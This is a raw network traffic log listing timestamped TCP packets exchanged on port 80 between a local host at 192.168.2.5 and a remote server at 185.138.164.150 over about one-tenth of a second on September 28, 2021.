Sep 28, 2021 07:38:37.744291067 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.744327068 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.744924068 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.744949102 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.744965076 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.744992971 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.745016098 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.745290041 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.745315075 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.745332956 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.745378017 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.745771885 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.745795965 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.745834112 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.745954037 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.746010065 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.746093988 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.746113062 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.746133089 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.746150970 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.746164083 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.746169090 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.746177912 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.746254921 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.746795893 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.746826887 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.746845961 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.746881008 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.747570038 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.747596025 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.747612953 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.747628927 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.747653961 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.747939110 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.747960091 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.747977018 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.748024940 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.748430967 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.748472929 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.748491049 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.748491049 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.748536110 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.748827934 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.748847961 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.748861074 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.748914003 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.749036074 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.749092102 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.749100924 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.749119997 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.749182940 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.749767065 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.749792099 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.749809980 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.749846935 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.750199080 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.750250101 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.750262022 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.750329018 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.750348091 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.750360966 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.750379086 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.750392914 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.750396967 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.750406027 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.750439882 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.750744104 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.750946999 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.750968933 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.750986099 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.750999928 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.751034021 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.751270056 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.751293898 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.751311064 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.751338005 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.751763105 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.751786947 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.751805067 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.751823902 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.751857042 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.752155066 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.752177000 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.752219915 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.752274990 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.752595901 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.752619028 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.752635002 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.752646923 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.752686024 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.753109932 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.753134012 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.753150940 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.753180027 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.753518105 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.753544092 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.753561974 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.753577948 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.753607988 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.753751040 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.753820896 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.753865004 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.753871918 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.755481958 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.755508900 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.755531073 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.755547047 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.755561113 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.755564928 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.755604982 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.755621910 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.755636930 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.755640030 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.755654097 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.755671978 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.755688906 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.755698919 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.755707979 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.755724907 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.755726099 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.755778074 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.767630100 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.767663956 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.767680883 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.767694950 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.767729044 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.776485920 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.776524067 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.776540995 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.776603937 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.777271986 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.777328014 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.777345896 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.777357101 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.777363062 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.777384996 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.777410030 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.777430058 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.777455091 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.777926922 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.777997017 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.777998924 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.778018951 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.778036118 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.778055906 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.778058052 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.778074980 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.778089046 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.778111935 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.778141975 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.778739929 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.778765917 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.778781891 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.778822899 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.778834105 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.778853893 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.778871059 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.778882980 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.778919935 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.779556036 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.779582024 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.779598951 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.779633999 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.780009985 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.780044079 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.780065060 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.780090094 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.780113935 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.780625105 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.780693054 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.780713081 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.780733109 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.780744076 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.780752897 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.780767918 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.780805111 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.780971050 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.781385899 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.781410933 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.781445980 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.781461954 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.781759977 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.781775951 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.781789064 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.781801939 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.781816006 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.781836033 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.781850100 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.781872988 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.782339096 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.782382965 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.782397985 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.782404900 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.782474995 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.785263062 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.785293102 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.785309076 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.785322905 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.785342932 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.785356045 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.785370111 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.785373926 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.785393000 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.785408020 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.785420895 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.785437107 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.785449028 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.785464048 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.785487890 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.785489082 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.785497904 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.785501957 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.785504103 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.785516024 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.785535097 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.785537004 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.785543919 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.785547972 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.785569906 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.785605907 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.785613060 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.785621881 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.785662889 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.785717010 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.785757065 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.785770893 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.785804033 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.786207914 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.786232948 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.786257029 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.786300898 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.786318064 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.786351919 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.786391020 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.786416054 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.787147045 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.787177086 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.787195921 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.787208080 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.787240028 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.788657904 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.788686037 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.788701057 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.788769960 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.789113998 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.789136887 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.789154053 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.789170027 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.789170980 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.789190054 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.789206028 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.789208889 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.789239883 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.789241076 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.789288998 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.789303064 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.789323092 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.789335012 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.789347887 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.789361000 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.789372921 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.789427042 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.789433956 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.789453983 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.789470911 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.789488077 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.789546013 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.789870977 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.789894104 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.789912939 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.789930105 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.789952993 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.789961100 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.789973021 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.789999008 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.790046930 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.790687084 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.790718079 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.790767908 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.790783882 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.791347980 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.791376114 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.791407108 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.791465998 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.791534901 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.791774988 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.791806936 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.791848898 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.791868925 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.791868925 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.791882038 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.791903973 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.791946888 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.791980028 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.792593002 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.792619944 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.792633057 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.792651892 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.792685032 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.792705059 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.792927980 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.792948961 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.792960882 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.793003082 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.806651115 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.806691885 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.806705952 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.806740046 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.806813002 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.814161062 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.814197063 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.814213991 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.814266920 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.815258026 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.815311909 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.815318108 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.815332890 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.815449953 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.815480947 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.815525055 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.815570116 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.815629959 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.815773010 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.815795898 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.815814018 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.815824032 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.815860987 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.816257000 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.816343069 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.816360950 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.816382885 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.816400051 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.816401958 CEST	80	49731	185.138.164.150	192.168.2.5
